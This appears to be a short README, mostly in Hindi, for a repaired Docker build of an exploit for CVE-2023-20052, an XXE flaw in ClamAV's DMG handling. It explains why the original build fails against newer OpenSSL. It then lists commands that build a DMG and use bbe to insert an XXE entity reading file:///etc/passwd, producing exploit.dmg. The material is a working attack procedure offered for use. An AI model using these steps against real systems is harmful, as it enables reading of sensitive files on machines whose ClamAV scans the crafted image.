
CVE-2023-20052 (ClamAV XXE भेद्यता) के लिए सुधारित Docker बिल्ड जो वास्तव में कंपाइल होता है।
मूल एक्सप्लॉइट आधुनिक सिस्टम पर बिल्ड नहीं हो पाता:
HMAC_CTX struct अपूर्ण प्रकार त्रुटियाँdmg/filevault.c के कंपाइलेशन पर बिल्ड विफल होता हैlibssl1.0-dev (OpenSSL 1.0) का उपयोग करता हैlibdmg-hfsplus अप्रचलित OpenSSL 1.0 फ़ंक्शंस का उपयोग करता है:
HMAC_CTX_init() / HMAC_CTX_cleanup() (OpenSSL 1.1+ में हटा दिए गए)HMAC_CTX struct उपयोग (OpenSSL 1.1+ में अपारदर्शी)Ubuntu 18.04 OpenSSL 1.0 समर्थन वाला अंतिम LTS है।
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v $(pwd):/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
## Fixed Docker build for CVE-2023-20052 (ClamAV XXE) - Resolves OpenSSL 3.0 compilation errors. Uses Ubuntu 18.04 with OpenSSL 1.0 for compatibility with libdmg-hfsplus